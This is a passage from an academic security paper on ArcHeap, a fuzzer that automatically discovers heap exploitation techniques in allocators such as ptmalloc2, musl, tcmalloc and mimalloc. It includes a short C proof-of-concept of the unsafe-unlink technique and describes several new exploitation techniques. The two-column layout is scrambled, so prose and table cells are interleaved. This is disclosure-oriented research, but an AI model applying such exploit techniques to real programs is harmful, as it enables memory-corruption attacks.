ference between the buffer and a heap object. A RC H EAP also A RC H EAP exploits the in-place and cardinal metadata design
utilizes several pre-defined constants, e.g., zero or negative of heap allocators to prune its search space. In particular,
numbers, to evaluate its edge case handling. This is analogous A RC H EAP writes only a limited number of values — noted as
to classical fuzzing, which uses a fixed set of integers to check MAX_WRITE in the pseudocode, which is eight in our prototype
corner conditions (e.g., interesting values in AFL [75]). — from the start or the end of an object (see Line 31 – 51
Deallocation. A RC H EAP deallocates a randomly selected in Figure 4) since an allocator stores its metadata near the
heap pointer from the heap container using free(). To avoid boundary for locality (in-place metadata). Further, A RC H EAP
launching a double free bug, which will be emulated in the generates random values (see Table 5) that can be used for
bug invocation action, A RC H EAP checks an object’s status. If sizes or pointers in an allocator instead of fully random ones
A RC H EAP chooses an already freed pointer, it simply ignores (cardinal data).
the deallocation action to avoid the bug (Line 24 – 30). To explore various exploit techniques, A RC H EAP intro-
Heap & Buffer write. The next action that A RC H EAP duces systematic noises to generated values. In particular,
can formulate is writing random data to a heap object or the A RC H EAP modifies a value using linear (addition and multi-
global buffer. As aforementioned, to find heap exploitation plication) or shift transformation (addition only) according to
techniques, written data should be accurate in terms of their the value’s type. For example, a heap address can be shifted
positions and values, rendering classical fuzzing (i.e., purely by word granularity (i.e., respecting alignment); however,
1 p[0] = malloc(760); ❶�
p[1] = malloc(776); ❶ p[0] p[0]

...
2

3 // struct malloc_chunk *fake = p[1];


Heap container Shadow memory
4 // bypassing (1): P->size == next(P)->prev_size
5 // since fake->size = next(fake->prev_size = 0 by default
6 // bypassing (2): P->fd->bk == P && P->bk->fd == P
7 // NOTE: offsetof(fd) = 16, offsetof(bk) = 24 Global buffer Shadow memory

8 *(uintptr_t*)(p[1] + 16) = (uintptr_t)&p[1] + -24;


❸ ❷ p[0] p[1] p[2]
9 // fake->fd->bk = *(&p[1] - 24 + 24) = p[1] == fake p[0] ★ p[2] p[0] p[1] p[2] p[0] p[1] p[2]
10 *(uintptr_t*)(p[1] + 24) = (uintptr_t)&p[1] + -16;
Heap container Shadow memory Heap container Shadow memory
11 // fake->bk->fd = *(&p[1] - 16 + 16) = p[1] == fake
12 p[2] = malloc(760);
13 // shrink p[2]'s prev_size, making 'fake' as its prev chunk
Global buffer Shadow memory Global buffer Shadow memory
*(uintptr_t*)(p[1] + 768) = 768;
14

// [BUG] overflowing p[1] to make p[2]'s prev chunk freed, P=0


★ = (void*)&p[1] - offsetof(bk)
15
Discrepency after free() - Restricted write in the heap container
16 *(uintptr_t*)(p[1] + 776) = 768; ❷
17 // triggering unsafe(fake) via backward consolidation ❹ p[0] p[2] buf p[0] p[2] ❺
★ ★ p[0] ★ p[2] buf p[0] ★ p[2] buf
18 free(p[2]); ❸
19 // assert(p[1] == (void*)&p[1] - offsetof(bk)); Heap container Shadow memory Heap container Shadow memory
20 // writing with p[1]: overwriting p[3] to buf
21 ((uintptr_t*)p[1])[5] = (uintptr_t)buf; ❹ 800
22 // writing with p[3]: overwrite buf[0] with 800 Global buffer Shadow memory Global buffer Shadow memory
23 ((uintptr_t*)p[3])[0] = 800; ❺ Divergence after heap write - Arbitrary write in the heap container Divergence after heap write - Arbitrary write in the global buffer
24 // assert(buf[0] == 800);
Figure 6: Shadow memory states in Figure 5. Black circles in left top corner represent
Figure 5: A PoC code of unsafe unlink found
locations in the code of states. Gray-color boxes show divergence between original
by A RC H EAP that has been simplified for easier
memory and its shadow memory. Using this information, A RC H EAP can detect
explanation. Note that this PoC is a concretization
exploitation techniques.
of Figure 2b.

it is not multiplied by a constant because it is the pointer the global buffer address, and the container address. Such
type. Similar to deallocation, A RC H EAP writes data only in knowledge will affect future data generation by A RC H EAP,
a valid heap region (i.e., no overflow or underflow) to ensure as shown in Table 5.
legitimacy of an action (Line 33).
Bug invocation. To explore heap exploitation techniques
5.3 Detecting Techniques by Impact
in the presence of heap vulnerabilities, A RC H EAP needs to A RC H EAP detects four types of impact of exploitations that
conduct buggy actions. Currently, A RC H EAP handles six are the building blocks of a full chain exploit: arbitrary-
bugs in heap: ⃝ 1 overflow, ⃝ 2 write-after-free, ⃝ 3 off-by- chunk (AC), overlapping-chunk (OC), arbitrary-write (AW),
one overflow, ⃝4 off-by-one NULL overflow, ⃝ 5 double free, and restricted-write (RW). This approach has two benefits,
and ⃝6 arbitrary free. A RC H EAP performs only one of these namely, expressiveness and performance. These types are
bugs for a technique to limit the power of an adversary as useful in developing control-hijacking, the ultimate goal of
described in the threat model (see §3.2). Also, A RC H EAP an attacker. Thus, all existing techniques lead to one of these
allows repetitive execution of the same bug to emulate the types, i.e., can be represented by these types. Also, it causes
situation in which an attacker re-triggers the bug. small performance overheads to detect the existence of these
A RC H EAP deliberately builds a buggy action to ensure its types with a simple data structure shadowing the heap space.
occurrence. For overflow and off-by-one, A RC H EAP uses the 1 To detect AC and OC, A RC H EAP determines any over-
malloc_usable_size API to get the actual heap size to ensure lapping chunks in each allocation (Line 18 in Figure 4). To
overflow. This is necessary since the request size could be make the check safe, it replicates the address and size of a
smaller than the actual size due to alignment or the minimum chunk right after malloc since it could be corrupted when
size constraint. Particularly for ptmalloc2, A RC H EAP uses a buggy action is executed. Using the stored addresses and
a dedicated single-line routine to get the actual size since sizes, it can quickly check if a chunk overlaps with its data
ptmalloc2’s malloc_usable_size() is inaccurate under the structure (AC) or other chunks (OC).
presence of memory corruption bugs. Moreover, in double 2 To detect AW and RW, A RC H EAP safely replicates
free and write-after-free bugs, A RC H EAP checks whether a its data structures, the containers and the global buffer, us-
target chunk is already freed. If it is not freed yet, A RC H EAP ing the technique called shadow memory. During execution,
ignores this buggy action and waits for the next one. A RC H EAP synchronizes the state of the shadow memory
Model specifications. A user can optionally provide model whenever it performs actions that can modify its internal
specification either to direct A RC H EAP to focus on a certain structures: allocations for the container and buffer writes for
type of exploitation techniques or to restrict the conditions for the global buffer (Line 21, 49). Then, A RC H EAP checks the
a target environment. It accepts five types of a model specifi- divergence of the shadow memory when performing any ac-
cation: chunk sizes, bugs, impacts, actions, and knowledge. tion (Line 17, 29, 43, 50). Because of the explicit consistency
The first four types are self-explanatory, and knowledge is maintained by A RC H EAP, divergence can only occur when
about the ability of an attacker to break ASLR (i.e., prior previously executed actions modify A RC H EAP’s data struc-
knowledge of certain addresses). The user can specify three tures via an internal operation of the heap allocator. Later,
types of addresses that an attacker may know: a heap address, these actions can be reformulated to modify sensitive data of
an application instead of the data structure for exploitation. is effective enough for practical uses—it eliminates 84.3% of
A RC H EAP’s fuzzing strategies (Table 5) make this detec- non-essential actions on average (see §8.3).
tion efficient by limiting its analysis scope to its data struc-
tures. In general, a heap exploit technique can corrupt any Algorithm 1: Minimize actions that result in an im-
data, leading to scanning of the entire memory space. How- pact of exploitation
ever, the technique found by A RC H EAP can only modify Input :actions – actions that result in an impact
heap or the data structures because these are the only visible 1 origImpact ← GetImpact(actions)
addresses from its fuzzing strategies. A RC H EAP checks only 2 minActions ← actions
modification in its data structures, but ignores one in heap 3 for action ∈ actions do
because it is hard to distinguish a legitimate one (e.g., modi- 4 tempActions ← minActions − action
fying metadata in deallocation) from an abusing one (i.e., a 5 tempImpact = GetImpact(tempActions)
heap exploit technique) without a deep understanding of an 6 if origImpact = tempImpact then
allocator. This is semantically equivalent to monitoring the 7 minActions ← tempActions
violence of the implicit invariant of an allocator — it should 8 end
not modify memory that is not under its control. 9 end
Output :minActions – minimized actions that result in the
A RC H EAP distinguishes AW from RW based on the heap same impact
actions that introduce divergence. If a divergence occurs in
allocation or deallocation, it concludes RW, otherwise (i.e.,
in heap or buffer write), it concludes AW. The underlying Once minimized, A RC H EAP converts the encoded test case
intuition is that parameters in the former actions are hard to to a human-understandable PoC like that in Figure 5 using
control arbitrarily, but not in the latter ones. After detect- one-to-one mapping between each action and C code (e.g., an
ing divergence, A RC H EAP copies the original memory to its allocation action → malloc()).
shadow to stop repeated detections. 6 Implementation
A running example. Figure 6 shows the state of the shadow
We extended American Fuzzy Lop (AFL) to run our heap
memory when executing Figure 5. 1 After the first alloca-
action generator that randomly executes heap actions. The
tion, A RC H EAP updates its heap container and corresponding
generator sends a user-defined signal, SIGUSR2, if it finds
shadow memory to maintain their consistency, which might
actions that result in an impact of exploitation. We also
be affected by the action. 2 It performs two more allocations
modified AFL to save crashes only when it gets SIGUSR2 and
so updates the heap container and shadow memory accord-
ignores other signals (e.g., segmentation fault), which are not
ingly. 3 After deallocation, p[1] is changed into ⋆ due to
interesting in finding techniques. We carefully implemented
unlink() in ptmalloc2 (Figure 2a). At this point, A RC H EAP
the generator not to call heap APIs implicitly except for the
detects divergence of the shadow memory from the original
pre-defined actions for reproducing the actions. For example,
heap container. Since this divergence occurs during dealloca-
the generator uses the standard error for its logging instead of
tion, the impact of exploitation is limited to restricted writes
standard out, which calls malloc internally for buffering. To
in the heap container. 4 In this case, since the heap write
prevent the accidental corruption of internal data structures,
causes the divergence, the actions can trigger arbitrary writes
the generator allocates its data structures in random addresses.
in the heap container. 5 Since this heap write introduces di-
Thus, the bug actions such as overflow cannot modify the data
vergence in the global buffer, the actions can lead to arbitrary
structures since they will not be adjacent to heap chunks.
write in the global buffer.
7 Applications
5.4 Generating PoC via Delta-Debugging
7.1 New Heap Exploitation Techniques
To find the root cause of exploitation, A RC H EAP refines
test cases using delta-debugging [76], as shown in Algo- This section discusses the new exploitation techniques in
rithm 1. The algorithm is simple in concept: for each action, ptmalloc2 during our evaluation. Compared to the old tech-
A RC H EAP re-evaluates the impact of exploitation of the test niques, we determine their uniquenesses in two aspects: root
cases without it. If the impacts of the original and new test causes and capabilities, as shown in Table 6. More informa-
cases are equal, it considers the excluded action redundant tion (e.g., elapsed time or models) can be found in section
(i.e., no meaningful effect to the exploitation). The intuition §8. To share new attack vectors in ptmalloc2, the techniques
behind this decision is that many actions are independent (e.g., are reported and under review in how2heap [61], the de-facto
buffer writes and heap writes) so that the delta-debugging can standard for exploitation techniques. Most PoC codes are
clearly separate non-essential actions from the test case. Our available in Appendix A.
current algorithm is limited to evaluating one individual ac- Unsorted bin into stack (UBS). This technique overwrites
tion at a time. It can be easily extended to check with a the unsorted bin to link a fake chunk so that it can return the
sequence or a combination of heap actions together, but our address of the fake chunk (i.e., an arbitrary chunk). This is
evaluation shows that the current scheme using a single action similar to house of lore [7], which corrupts a small bin to
New Old Root Causes New Capability Allocators P I Impacts of exploitation
OC AC RW AW
UBS HL Unsorted vs. Small Only need one size of an object
HUE HE Unsorted vs. Free Does not require a heap address dlmalloc-2.7.2 ✓ ✓ OV, WF, DF (N) AF, OV, WF AF, OV, WF AF, OV, WF
UDF FD Small vs. Fast Can abuse a small bin with more checks dlmalloc-2.8.6 ✓ ✓ OV, WF, DF (N) OV (N) OV
musl-1.1.9 ✓ ✓ OV, WF, DF (N) AF, OV, WF AF, OV, WF AF, OV, WF
OCS OC Small vs. Unsorted Does not need a controllable allocation
FDO FD Consolidation vs. Fast Can allocate a non-fast chunk musl-1.1.24 ✓ ✓ OV, WF, DF AF, OV, WF AF, OV, WF AF, OV, WF
jemalloc-5.2.1 DF
tcmalloc-2.7 ✓ OV, DF OV, WF, DF OV OV
Table 6: New techniques found by A RC H EAP in ptmalloc2, which mimalloc-1.0.8 ✓ OV, WF, DF OV, WF WF
mimalloc-secure-1.0.8 ✓ DF
have different root causes and capabilities from old ones. DieHarder-5a0f8a52
mesh-a49b6134
DF
DF, NO

N: New techniques compared to the related work, HeapHopper [17]; only top three
achieve the same attack goal. However, the unsorted bin into allocators matter. NO: No bug is required, i.e., incorrect implementations. I: In-place
metadata, P: ptmalloc2-related allocators.
stack technique requires only one kind of allocation, unlike
house of lore, which requires two different allocations, to Table 7: Summary of exploit techniques found by A RC H EAP in
move a chunk into a small bin list. This technique has been real-world allocators with their version or commit hash.
added to how2heap [61].
unsorted bin during the deallocation process. Unlike other
House of unsorted einherjar (HUE). This is a variant of
techniques related to the fast bin, this fake chunk does not
house of einherjar, which uses an off-by-one NULL byte
have to be in the fast bin. We exclude this PoC due to space
overflow and returns an arbitrary chunk. In house of einher-
limits, but it is available in our repository.
jar, attackers should have prior knowledge of a heap address
to break ASLR. However, in house of unsorted einherjar, at- 7.2 Different Types of Heap Allocators
tackers can achieve the same effect without this pre-condition.
We named this technique house of unsorted einherjar, as it We also applied A RC H EAP to the 10 different allocators with
interestingly combines two techniques, house of einherjar various versions. First, we tested dlmalloc 2.7.2, dlmalloc
and unsorted bin into stack, to relax the requirement of the 2.8.6 [41], and musl [59] 1.1.9, which were used in the re-
well-known exploitation technique. lated work, HeapHopper [17]. Moreover, we tested other
real-world allocators: the latest version of musl (1.1.24), je-
Unaligned double free (UDF). This is an unconventional
malloc [19], tcmalloc [26], Microsoft mimalloc [43] with
technique that abuses double free in a small bin, which is
its default and secure mode (noted as mimalloc-secure), and
typically considered a weak attack surface thanks to compre-
LLVM Scudo [45]. Furthermore, we evaluated allocators
hensive security checks. To avoid security checks, a victim
from academia: DieHarder [49], Mesh [56], FreeGuard [64],
chunk for double free should have proper metadata and is
and Guarder [65]. Applying A RC H EAP to other allocators
tricked to be under use (i.e., P bit of the next chunk is one).
was trivial; we leveraged LD_PRELOAD to use a new allocator.
Since double free doesn’t allow arbitrary modification of
Under the assumption that internal details of the allocators
metadata, existing techniques only abuse a fast bin or tcache,
are unknown, we ran A RC H EAP with four models specify-
which have weaker security checks than a small bin (e.g.,
ing each impact (i.e., OC, AC, RW, and AW) one by one to
fast-bin-dup in Table 4).
exhaustively explore possible techniques. After 24 hours of
Interestingly, unaligned double free bypasses these security evaluation, it found several exploit techniques among seven
checks by abusing the implicit behaviors of malloc(). First, out of 10 allocators except for Scudo, FreeGuard, and Guarder
it reuses the old metadata in a chunk since malloc() does due to their secure design. We also tested A RC H EAP with cus-
not initialize memory by default. Second, it fills freed space tom allocators from DARPA Cyber Grand Challenge, whose
before the next chunk to make the P bit of the chunk one. As results can be found in §A.1.
a result, the technique can bypass all security checks and can
As shown in Table 7, A RC H EAP discovers various exploita-
successfully craft a new chunk that overlaps with the old one.
tion techniques for ptmalloc2-related allocators: dlmalloc—
Overlapping chunks using a small bin (OCS). This is a the ancestor of ptmalloc2 and musl—a libc implementation
variant of overlapping-chunks (OC) that abuses the unsorted in embedded systems inspired by dlmalloc. In dlmalloc
bin to generate an overlapping chunk, but this technique crafts 2.7.2, dlmalloc 2.8.6, and musl 1.1.9, A RC H EAP not only
the size of a chunk in a small bin. Unlike OC, it requires more re-discovered all techniques found by HeapHopper, but also
actions — three more malloc() and one more free()— but newly found the following facts: 1) these allocators are all
doesn’t require attackers to control the allocation size. When vulnerable to double free, and 2) an arbitrary chunk is still
attackers cannot invoke malloc() with an arbitrary size, this achievable through overflow in dlmalloc-2.8.6. This was hid-
technique can be effective in crafting an overlapping chunk den in HeapHopper due to its limitation to handle symbolic-
for exploitation. size allocation. Note that we merged special cases of overflow
Fast bin into other bin (FDO). This is another interest- (O1, O1N) into OV to be consistent with HeapHopper [17],
ing technique that allows attackers to return an arbitrary ad- and our claims for new techniques are very conservative; we
dress: it abuses consolidation to convert the type of a vic- claim discovery of new techniques only when HeapHopper
tim chunk from the fast bin to another type. First, it cor- cannot find equivalent or more powerful ones (e.g., AC is
rupts a fast bin free list to insert a fake chunk. Then, it more powerful than OC). We further compare A RC H EAP
calls malloc_consolidate() to move the fake chunk into the with HeapHopper in §8.1. A RC H EAP also found that musl
fully found this corner case without having any hint about the
internals of the allocators using its randomized exploration.
PoC is available in Figure A.3.
Mesh: memory duplication using allocations with nega-
tives sizes. A RC H EAP found that if an attacker allocates an
object with negative size, Mesh will return the same chunk
twice (i.e., duplication) instead of NULL.
Figure 7: The number of working PoCs from one source LTS in
various Ubuntu LTS. For example, 56 PoCs were generated from 7.3 Evolution of Security Features
precise, 49 of them work in trusty and xenial, and 45 of them
work in bionic. We applied A RC H EAP to four versions of ptmalloc2 dis-
tributed in Ubuntu LTS: precise (12.04, libc 2.15), trusty
(14.04, libc 2.19), xenial (16.04, libc 2.23), and bionic
has no security improvement in the latest version; all tech- (18.04, libc 2.27). In trusty and xenial, a new security
niques in musl 1.1.9 are still working in 1.1.24. check that checks the integrity of size metadata (refer (1) in
A RC H EAP also successfully found several heap exploit Figure 2a) is backported by the Ubuntu maintainers. To com-
techniques in allocators that are dissimilar to ptmalloc2 (see pare each version, we perform differential testing: we first
Table 7) for the following reasons. First, A RC H EAP’s model, apply A RC H EAP to each version and generate PoCs. Then,
which is based on the common designs in allocators (§2.1), we validate the generated PoCs from one version against other
is generic enough to cover non-ptmalloc allocators. For ex- versions. (see Figure 7).
ample, tcmalloc [26] is aiming at high performance comput- We identified three interesting trends that cannot be eas-
ing, resulting in very different design from ptmalloc2’s (e.g., ily obtained without A RC H EAP’s automation. First, a new
heavy use of thread-local cache). However, tcmalloc still security check successfully mitigates a few exploitation tech-
follows our model: its metadata are placed in the head of a niques found in an old version of ptmalloc2: likely, the libc
chunk (in-place metadata) and consist of linked list pointers maintainer reacts to a new, popular exploitation technique.
(cardinal data). Thus, A RC H EAP can find several techniques Second, an internal design change in bionic rendered the
in tcmalloc including one that can lead to an arbitrary chunk most PoCs generated from previous versions ineffective. This
using overflow (see Figure A.2). It is worth emphasizing that indicates the subtleties of the generated PoCs, requiring pre-
our model only depends on metadata’s appearance, not on cise parameters and the orders of API calls for successful
their generation or management, which introduce more vari- exploitation. However, this does not particularly mean that a
ety in design, making generalization difficult. Second, thanks new version, bionic, is secure; the new component, tcache,
to standardized APIs, A RC H EAP can find exploit techniques indeed makes exploitation much easier, as Figure 7 shows.
even in allocators that are deviant from our model (e.g., je- Third, this new component, tcache, which is designed to im-
malloc). In particular, A RC H EAP discovered techniques that prove the performance [15], weakens the security of the heap
are reachable only using APIs (e.g., double free) although the allocators, not just making it easy to attack but also introduc-
allocators have removed in-place metadata for security. ing new exploitation techniques. This is similarly observed
A RC H EAP helps to find implementation bugs in allocators by other researchers and communities [17, 37].
by showing unexpected exploit primitives in secure alloca-
tors or that can be invokable without a bug. Accordingly, 8 Evaluation
A RC H EAP found three bugs in mimalloc-secure, DieHarder, This section tries to answer the following questions:
and Mesh. We reported our findings to the developers; two of 1. How effective is A RC H EAP in finding new exploitation
them got acknowledged and are patched. It is worth mention- techniques compared to the state-of-the-art technique,
ing that our auto-generated PoC has been added to mimalloc HeapHopper?
as its regression test. In the following, we discuss each issue 2. How exhaustively can A RC H EAP explore the security-
that A RC H EAP found. critical state space?
DieHarder, mimalloc-secure: memory duplication in 3. How effective is delta-debugging in removing redundant
large chunks using double free. A RC H EAP found the heap actions?
technique that allows the duplication large chunks (more than Evaluation setup. We conducted all the experiments on
64K bytes) in the well-known secure allocators, DieHarder Intel Xeon E7-4820 with 256 GB RAM. For seeding, we used
and mimalloc-secure. Interestingly, even though the alloca- 256 random bytes that are used to indicate a starting point of
tors have no direct relationship according to the developer of the state exploration and are not critical, as A RC H EAP tends
mimalloc [43], A RC H EAP found that both allocators are vul- to converge during the state exploration.
nerable to this technique. Their root causes are also distinct:
DieHarder misses verifying its chunk’s status when allocat- 8.1 Comparison to HeapHopper
ing large chunks, unlike for smaller chunks, and mimalloc HeapHopper [17] was recently proposed to analyze existing
checked the status of an incorrect block. A RC H EAP success- exploitation techniques in varying implementations of an allo-
Name Bug Impact Chunks # Txn Size TxnList (A list of transactions) 1 New techniques
FD WF AC Fast 8 {8} M-M-F-WF-M-M
Name Bug Impact Chunks # Txn A RC H EAP HeapHopper
UU O1 AW,RW Small 6 {128} M-M-O1-F
HS AF AC Fast 4 {48} AF-M T F O µ σ T F O µ σ
PN O1N OC Small 12 {128,256,512} M-M-M-F-O1N-M-M-F-F-M FDO WF AC Fast, Large —
HL WF AC Small 9 {100,1000} M-M-F-M-WF-M-M
OC O1 OC Small 8 {120,248,376} M-M-M-F-O1-M UBS WF AC Small 6 3† 0 0 20.2m 5m 0 0 3 ∞ -
UB WF AW,RW Small 7 {400} M-M-F-WF-M
HE O1 AC Small 7 {56,248,512} M-M-O1-F-M HUE O1 AC Small 9 2‡ 0 1 14.4h 8.9h 0 0 3 ∞ -
OCS OV OC Small 9 3 0 0 17.3s 1.2s 0 0 3 ∞ -
# Txn: The number of transactions, M: malloc, F: free UDF DF OC Small 9 3 0 0 19.9s 5.2s 0 0 3 ∞ -
Found 11 0 1 ⇒ #4 0 0 12 ⇒ #0
Table 8: Exploit-specific models for known techniques from
T: True positives, F: False positives, O: Timeout,
HeapHopper. It is worth noting that the results of variants (i.e., µ: Average time, σ : Standard deviation of time
techniques have same prerequisites, but different root causes) are
identical for A RC H EAP with no specific model (marked with † and Table 9: The number of experiments (at most three) that discover
‡ in Table 9 and Table 10) since A RC H EAP neglects the number of new exploitation techniques, the number of found techniques — the
transactions (i.e., # Txn). number after hash (#) sign, elapsed time, and corresponding models.
Briefly, A RC H EAP discovered all four techniques, but HeapHopper
failed to. We omitted FDO, which has a superset model of FD;
cator. Because of its goal, HeapHopper emphasizes complete- therefore, it becomes indistinguishable to FD (see, Table 8).
ness and verifiability, differentiating its method (i.e., symbolic
execution) from A RC H EAP’s (i.e., fuzzing). To overcome the
periment, FDO is excluded because its model is a superset of
state explosion in symbolic execution, HeapHopper tightly
FD; having FDO simply makes A RC H EAP and HeapHopper
encodes the prior knowledge of exploit techniques into its
converge to FD.
models, e.g., the number of transactions (i.e., non-write ac-
HeapHopper fails to identify all unknown exploitation prim-
tions in A RC H EAP), allocation sizes (i.e., guiding the use of
itives with no exploit-specific models (see Table 9). In fact,
specific bins), and even a certain order of transactions. By
it encounters a few fundamental problems of symbolic ex-
relying on this model, it could incrementally perform the
ecution: 1) exponentially growing permutations of transac-
symbolic execution for all permutations of transactions. Un-
tions and 2) huge search spaces in selecting proper size and
fortunately, its key idea—guiding the state exploration with
orders to trigger exploitation. Although HeapHopper demon-
detailed models— limits its capability to only its original
strated a successful state exploration of seven transactions
purpose that validates known exploitation techniques, unlike
with three size parameters (§7.1 in [17]), the search space
our approach can find unknown techniques.
required for discovering new techniques is much larger, ren-
Despite their different purposes, their outputs are equiva- dering HeapHopper’s approach computationally infeasible.
lent to heap exploitation techniques; therefore, we need to On the contrary, A RC H EAP successfully explores the search
show the orthogonality of A RC H EAP and HeapHopper; nei- space using the random strategies, and indeed discovers un-
ther of them can replace the other. To objectively compare known techniques.
both approaches, we performed three experiments: 1 finding
unknown techniques with no exploit-specific model (i.e., ap- 2 Known techniques with partly specified models. We
plying HeapHopper to A RC H EAP’s task), 2 finding known also evaluate the role of exploit-specific models in both ap-
techniques with partly specified models (i.e., evaluating the proaches, which are unavailable in finding new techniques.
roles of specified models in each approach), and 3 finding In particular, we evaluated both systems with partial mod-
known techniques with exploit-specific models (i.e., applying els, namely, the size parameters (+Size) and a sequence of
A RC H EAP to HeapHopper’s task). In the experiments, we transactions (+TxnList), used in HeapHopper (see, Table 8).
considered variants of exploit techniques1 as an equal class To prevent each system from converging to easy-to-find tech-
since both systems cannot distinguish their subtle differences. niques, we tested each model on top of the baseline heap
We ran each experiment three times with a 24-hour timeout model (i.e., Bug+Impact+Chunks).
for proper statistical comparison [40]. We used the default This experiment (i.e., 2 in Table 10) shows that A RC H EAP
option for HeapHopper since it shows the best performance outperforms HeapHopper with no or partly specified models:
in the following experiments (see §A.2). A RC H EAP found five more known techniques than HeapHop-
per in both +Size and Bug+Impact+Chunks. Interestingly,
1 New techniques. We first check if HeapHopper’s ap-
A RC H EAP can operate worse with additional information;
proach can be used to find previously unknown exploita-
A RC H EAP found three fewer techniques in +TxnList. Un-
tion techniques that A RC H EAP found (see, §7.1). To apply
like A RC H EAP, exploit-specific models are beneficial to
HeapHopper, we provided models that specify all sizes for
HeapHopper, finding one more techniques when +TxnList
corresponding bins but limit the number of transactions fol-
is given. This result shows that a precise model plays an
lowing our PoCs, as shown in Table 9. Note that, in theory,
essential role in symbolic execution but not in fuzzing. In
such relaxation is general enough to discover new techniques
short, A RC H EAP is particularly preferable when exploring
given an infinite amount of computing resources. In the ex-
unknown search space, (i.e., finding new techniques), where
1 Exploit an accurate model is inaccessible.
techniques often have the same prerequisite but different root
causes such as UBS and HL. 3 Known techniques with exploit-specific models When
2 Known techniques with partly specified models 3 Known techniques with exploit-specific models.
Bug+Impact+Chunks +Size +TxnList +Size, TxnList
Name A RC H EAP HeapHopper A RC H EAP HeapHopper A RC H EAP HeapHopper A RC H EAP HeapHopper
T F O µ σ T F O µ σ T F O µ σ T F O µ σ T F O µ σ T F O µ σ T F O µ σ T F O µ σ
FD 3 0 0 2.7m 1.2m 3 0 0 3.8m 0.3s 3 0 0 57.1s 27.1s 3 0 0 3.8m 0.9s 3 0 0 14.2m 4.3m 3 0 0 10.7m 2.1m 3 0 0 10.2m 7.2m 3 0 0 23.5s 0.2s
UU 3 0 0 57.9m 40.4m 0 0 3 ∞ - 3 0 0 1.6h 1.1h 0 0 3 ∞ - 0 0 3 ∞ - 0 3 0 3.2h 26.3m 0 0 3 ∞ - 0 3 0 8.2h 13m
HS 3 0 0 2.7m 59.7s 3 0 0 31.4s 0.2s 3 0 0 9.3m 6.1m 3 0 0 31.1s 0.2s 0 0 3 ∞ - 3 0 0 56s 0.8s 0 0 3 ∞ - 3 0 0 28.6s 0.2s
PN 3 0 0 13.3m 24.4s 0 0 3 ∞ - 3 0 0 16.1m 14.9m 0 0 3 ∞ - 3 0 0 1.6h 57m 0 0 3 ∞ - 3 0 0 26m 12.6m 3 0 0 4.3m 1.6s
HL 3† 0 0 20.2m 5m 0 0 3 ∞ - 3 0 0 1.2m 47.3s 0 0 3 ∞ - 2 0 1 13.2h 8.5h 0 0 3 ∞ - 3 0 0 21m 9.4m 2 1 0 2.2m 8.2s
OC 3 0 0 7.1s 5.9s 0 0 3 ∞ - 3 0 0 20s 5.3s 0 0 3 ∞ - 3 0 0 6s 2.4s 3 0 0 22.1h 33.2m 3 0 0 26.6s 34s 3 0 0 3.2m 2s
UB 3 0 0 36.8s 22.8s 3 0 0 21.8s 0.2s 3 0 0 4.7s 3.1s 3 0 0 21.9s 0.3s 3 0 0 24.8s 14.9s 3 0 0 47.6s 0.3s 3 0 0 12.6s 9.5s 3 0 0 19.5s 0.7s
HE 2‡ 0 1 14.4h 8.9h 0 0 3 ∞ - 2 0 1 9.3h 10.4h 0 0 3 ∞ - 0 0 3 ∞ - 0 0 3 ∞ - 0 0 3 ∞ - 0 3 0 6.8m 6.4s
Found 23 0 1 ⇒ #8 9 0 15 ⇒ #3 23 0 1 ⇒ #8 9 0 15 ⇒ #3 14 0 10 ⇒ #5 12 3 9 ⇒ #4 15 0 9 ⇒ #5 17 7 0 ⇒ #6

Table 10: The number of discovered known exploitation techniques and elapsed time for discovery in A RC H EAP and HeapHopper with various
models. In summary, A RC H EAP outperforms HeapHopper with no or partly specified models, e.g., A RC H EAP found five more techniques
with no specific model (Bug+Impact+Chunks). Even though HeapHopper found one more technique than A RC H EAP if exploit-specific models
are available, it suffers from false positives (marked in gray).

exploit-specific models (+Size, TxnList) are provided, Name Error message Version Xenial Bionic
HeapHopper’s approach works better: It found one more C1 corrupted double-linked list 2.3.4 ✓ ✓
C2 corrupted double-linked list (not small) 2.21 ✓
known technique and found four techniques more quickly C3 free(): corrupted unsorted chunks 2.11 ✓ ✓
C4 malloc(): corrupted unsorted chunks 1 2.11
than A RC H EAP (as illustrated in 3 in Table 10). This shows C5 malloc(): corrupted unsorted chunks 2 2.11 ✓ ✓
the strength of HeapHopper in validating existing techniques, C6 malloc(): smallbin double linked list corrupted 2.11 ✓ ✓
C7 free(): invalid next size (fast) 2.3.4 ✓ ✓
rendering orthogonality of both tools. We observed one in- C8 free(): invalid next size (normal) 2.3.4 ✓ ✓
C9 free(): invalid size 2.4 ✓ ✓
teresting behavior of HeapHopper in this experiment. With C10 malloc(): memory corruption 2.3.4 ✓ ✓
C11 double free or corruption (!prev) 2.3.4 ✓ ✓
more exploit models specified, HeapHopper tends to suffer C12 double free or corruption (fasttop) 2.3.4 ✓ ✓
from false positives because of its internal complexity, as C13 double free or corruption (top) 2.3.4 ✓ ✓
C14 double free or corruption (out) 2.3.4 ✓ ✓
noted in the paper [17]. Despite its small numbers – dozens C15 malloc(): memory corruption (fast) 2.3.4 ✓ ✓
C16 malloc_consolidate(): invalid chunk size 2.27 — ✓
in three experiments — this shows incorrectness in HeapHop- C17 break adjusted to free malloc space 2.10.1 ✓ ✓
per, resulting in failures to find UU and UE. We confirmed C18 corrupted size vs. prev_size 2.26 ✓ ✓
C19 free(): invalid pointer 2.0.1 ✓ ✓
these false positives with HeapHopper’s authors. On the con- C20 munmap_chunk(): invalid pointer 2.4 ✓ ✓
C21 invalid fastbin entry (free) 2.12.1
trary, A RC H EAP’s approach does not introduce false positives
thanks to its straightforward analysis at runtime. Table 11: Security checks in ptmalloc2 covered by A RC H EAP;
This experiment also highlights an interesting design deci- an unique identifier for a check, an error message for its failure,
sion of A RC H EAP: separating the exploration and reducing and version that the check is first introduced, and covered ones by
phases. With no exploit-specific guidance, A RC H EAP can A RC H EAP in Ubuntu versions.
freely explore the search space for finding heap exploitation
techniques, and so increase the probability of satisfying the bug, which is outside of the scope of this work. C2 and C4
precondition of certain exploitation techniques. For exam- require a strict relationship between large chunks (e.g., the
ple, if the sequence of transactions of UU (M-M-O1-F) is sizes of two chunks are not equal but less than the minimum
enforced, A RC H EAP should craft a fake chunk within a rel- size), which is probably too stringent for any randomization-
atively small period (i.e., between four actions) to trigger based strategies.
the exploit; otherwise, A RC H EAP has a higher probability to
8.3 Delta-Debugging-Based Minimization
formulate a fake chunk by executing more, perhaps redun-
dant, actions. However, such redundancy is acceptable in The minimization technique based on delta-debugging is ef-
A RC H EAP thanks to our minimization phase that effectively fective in simplifying the generated PoCs for further analysis.
